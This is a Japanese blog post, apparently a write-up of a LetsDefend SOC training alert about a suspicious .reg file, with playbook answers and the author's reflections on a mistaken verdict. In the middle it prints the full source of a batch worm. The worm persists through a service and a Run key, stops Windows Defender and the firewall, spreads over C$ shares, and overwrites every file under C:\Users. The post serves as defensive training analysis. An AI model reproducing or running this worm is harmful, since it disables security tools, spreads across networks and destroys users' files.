4ensiX

4ensiX

FPと言ったものはFPを選んだが表示はTPになっていることに気づいた。

LetsDefend level 1 alert SOC117 - Suspicious .reg File event-id 50

Details

EventID: 50
Event Time: Feb. 6, 2021, 1:58 p.m.
Rule: SOC117 - Suspicious .reg File
Level: Security Analyst
Source Address 172.16.17.51
Source Hostname Aldo
File Name config.reg
File Hash f705ac114767397fb5e7cd1603e70954
File Size 16.3 MB
Device Action Blocked
Download (Password:infected): f705ac114767397fb5e7cd1603e70954.zip

playbook

Define Threat Indicator

Answer:Other

Check if the malware is quarantined/cleaned

Device Action Blocked

Answer: Quarantined

Analyze Malware

config.reg

VirusTotal: https://www.virustotal.com/gui/file/97d7fc21caf2e830076d8d880bdfe906fae5a4925e6c1012087b764a75989089
HybridAnalysis:https://www.hybrid-analysis.com/sample/97d7fc21caf2e830076d8d880bdfe906fae5a4925e6c1012087b764a75989089
脅威であるようなレポートは無い。
中にはAutorunやStart up Folderに関わるKeyが見つかったが、

HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\SHELL FOLDERS

コマンドが登録されているならともかく、ファイルが登録されていそうだ。それなら、そのファイルが無ければ問題無いのでは。

importantUpdate.bat

今回のzipファイルには何故か、別のファイルも含まれていた。
VirusTotal: https://www.virustotal.com/gui/file/fc4de26ede0690dbc4ef4ed7ffcc28c086d5c8998f2cbe1e2c3c20516c7da2db
このbatch wormに関しては、説明がstackoverflowに
malware - How this "batch worm" works? - Stack Overflow
ページの中身のテキストだけで、BAT/wormとしてアンチウイルスソフトに検出される。

@echo off
SET i=0
SET "NomeProcesso=DaMonki.exe"
SET "NomeService=DaMonki"

rem <=== run as service ===>
echo sc create %NomeService% binpath=%0 > service.bat
echo sc start %NomeService% >> service.bat
attrib +h +r +s service.bat
start service.bat
rem <=== startup registry ===>
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Services" /t "REG_SZ" /d %0
attrib +h +r +s %0
rem <=== kill firewall and windows defender ===>
net stop "Windows Defender Service"
net stop "Windows Firewall"
rem <=== INFECT NETWORK!!! ===>
:Worm
net use Z: \\192.168.1.%i%\C$
if exist Z: (for /f %%u in ('dir Z:\Users /b') do copy %0 "Z:\Users\%%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Services.exe"
mountvol Z: /d)
if %i% == 256 (goto Infect) else (set /a i=i+1)
goto Worm
rem <=== infect *.* in C:\Users ===>
:Infect
for /f %%f in ('dir C:\Users\*.* /s /b') do (rename %%f *.bat)
for /f %%f in ('dir C:\Users\*.bat /s /b') do (copy %0 %%f)

自身の自動起動設定を行って、共有ドライブのUsersフォルダ内のStart up Folderに自身を登録して、Usersフォルダ内のファイルを全てimportantUpdate.batに書き換えるようだ。
まさにWorm


importantUpdate.batがMaliciousなので、Maliciousなのだろうか。
今回のアラートはregに対するものでregは、Non-Maliciousであると考えるので
Answer: Non-Malicious

Add Artifacts

Value Type Comment
f705ac114767397fb5e7cd1603e70954 MD5 Hash unknown .reg file

TPとは言い切れないのでFPではないのかと。

End

f:id:Zarat:20220210002844p:plain
close alert event-id 50

ボロボロだ。
regにはAutorunやStart up Folderに関わるものがあったのは怪しいものだったか。他のも怪しいKeyはあったといえばあった。
怪しいならTPぐらいが良かったか。にしてもbatch wormは何だったのか。
一つ文句を言うなら、怪しい.regファイルは怪しく無くとも.regを使うケースの方が珍しいのでそもそもポリシーとして禁止しても良さそうではないか。